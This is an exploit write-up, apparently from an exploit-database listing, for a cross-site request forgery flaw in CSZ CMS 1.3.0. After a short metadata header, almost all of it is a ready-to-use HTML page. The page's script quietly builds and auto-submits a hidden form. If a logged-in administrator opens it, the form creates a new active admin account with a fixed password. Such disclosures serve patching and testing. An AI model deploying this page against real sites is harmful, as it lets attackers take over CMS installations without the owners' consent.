# Exploit Title: CZS CMS 1.3.0 - Cross Site Request Forgery (CSRF) (Add
Admin)
# Date: 2024-05-03
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://www.cszcms.com
# Software Link:
https://www.cszcms.com/link/3#https://sourceforge.net/projects/cszcms/files/latest/download
# Version: latest
# Tested on: MacOS


##################################### CSRF PoC
#####################################

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>CSRF PoC</title>
</head>
<body>

<script>
// Create a hidden form
var form = document.createElement("form");
form.setAttribute("method", "POST");
form.setAttribute("action", "http://TARGETSITE/admin/users/new/add");
form.setAttribute("target", "_blank"); // Open in a new tab

// Add form fields
var fields = {
name: "admin",
email: "admin@admin.com",
password: "pass",
con_password: "pass",
group: "1",
pass_change: "yes",
active: 1
// Add other fields as needed
};

// Append fields to the form
for (var key in fields) {
if (fields.hasOwnProperty(key)) {
var input = document.createElement("input");
input.setAttribute("type", "hidden");
input.setAttribute("name", key);
input.setAttribute("value", fields[key]);
form.appendChild(input);
}
}

// Add the form to the page
document.body.appendChild(form);

// Submit the form
form.submit();
</script>

</body>
</html>

##################################### CSRF PoC Ended
#####################################